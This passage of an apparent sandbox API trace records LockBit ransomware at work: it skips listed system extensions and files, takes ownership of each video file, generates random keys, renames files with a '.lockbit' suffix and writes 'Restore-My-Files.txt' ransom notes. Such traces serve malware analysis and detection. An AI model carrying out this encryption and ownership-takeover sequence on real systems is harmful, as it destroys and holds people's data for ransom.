(lpString1="iconcache.db", lpString2="Scenes_INTRO_BG.wmv") returned -1 [0084.868] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.868] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv") returned=".wmv" [0084.868] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0084.868] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0084.868] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0084.869] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0084.869] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv.lockbit") returned 77 [0084.869] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.870] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.870] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.870] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.870] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.871] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.871] RtlFreeAnsiString (AnsiString="\\") [0084.871] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.871] malloc (_Size=0x200) returned 0x77d800 [0084.871] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.871] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.871] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.871] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.872] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.872] CloseHandle (hObject=0x3b4) returned 1 [0084.872] free (_Block=0x77d800) [0084.872] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.873] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.873] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.873] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=253226) returned 1 [0084.873] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.873] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.873] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.874] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.879] malloc (_Size=0xb0) returned 0x1ff1e60 [0084.880] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0084.887] free (_Block=0x1ff1e60) [0084.887] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.887] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.887] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.887] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72180d5f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72180d5f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ec1184f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3fc64, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scenes_INTRO_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0084.888] lstrcmpiW (lpString1=".", lpString2="Scenes_INTRO_BG_PAL.wmv") returned -1 [0084.888] lstrcmpiW (lpString1="..", lpString2="Scenes_INTRO_BG_PAL.wmv") returned -1 [0084.888] PathFindExtensionW (pszPath="Scenes_INTRO_BG_PAL.wmv") returned=".wmv" [0084.888] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0084.888] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0084.889] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0084.889] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0084.890] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Scenes_INTRO_BG_PAL.wmv") returned -1 [0084.890] lstrcmpiW (lpString1="ntldr", lpString2="Scenes_INTRO_BG_PAL.wmv") returned -1 [0084.890] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Scenes_INTRO_BG_PAL.wmv") returned -1 [0084.890] lstrcmpiW (lpString1="bootsect.bak", lpString2="Scenes_INTRO_BG_PAL.wmv") returned -1 [0084.890] lstrcmpiW (lpString1="autorun.inf", lpString2="Scenes_INTRO_BG_PAL.wmv") returned -1 [0084.890] lstrcmpiW (lpString1="thumbs.db", lpString2="Scenes_INTRO_BG_PAL.wmv") returned 1 [0084.890] lstrcmpiW (lpString1="iconcache.db", lpString2="Scenes_INTRO_BG_PAL.wmv") returned -1 [0084.891] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.891] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv") returned=".wmv" [0084.891] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0084.891] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0084.891] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0084.892] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0084.892] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv.lockbit") returned 81 [0084.892] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.894] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.894] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.894] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.895] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.895] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.895] RtlFreeAnsiString (AnsiString="\\") [0084.895] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.895] malloc (_Size=0x200) returned 0x77d800 [0084.895] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.895] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.895] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.895] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.896] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.896] CloseHandle (hObject=0x3b4) returned 1 [0084.896] free (_Block=0x77d800) [0084.896] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.897] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.897] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.897] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=261220) returned 1 [0084.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.899] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.919] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.919] malloc (_Size=0xb8) returned 0x1ff1e60 [0084.919] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0084.920] free (_Block=0x1ff1e60) [0084.920] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.920] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.920] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.920] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x721cd019, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x721cd019, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ec379ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2a8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scenes_LOOP_BG.wmv", cAlternateFileName="")) returned 1 [0084.920] lstrcmpiW (lpString1=".", lpString2="Scenes_LOOP_BG.wmv") returned -1 [0084.920] lstrcmpiW (lpString1="..", lpString2="Scenes_LOOP_BG.wmv") returned -1 [0084.920] PathFindExtensionW (pszPath="Scenes_LOOP_BG.wmv") returned=".wmv" [0084.920] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0084.921] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0084.922] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0084.922] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0084.923] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Scenes_LOOP_BG.wmv") returned -1 [0084.923] lstrcmpiW (lpString1="ntldr", lpString2="Scenes_LOOP_BG.wmv") returned -1 [0084.923] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Scenes_LOOP_BG.wmv") returned -1 [0084.923] lstrcmpiW (lpString1="bootsect.bak", lpString2="Scenes_LOOP_BG.wmv") returned -1 [0084.923] lstrcmpiW (lpString1="autorun.inf", lpString2="Scenes_LOOP_BG.wmv") returned -1 [0084.923] lstrcmpiW (lpString1="thumbs.db", lpString2="Scenes_LOOP_BG.wmv") returned 1 [0084.923] lstrcmpiW (lpString1="iconcache.db", lpString2="Scenes_LOOP_BG.wmv") returned -1 [0084.923] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.923] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv") returned=".wmv" [0084.924] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0084.924] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW 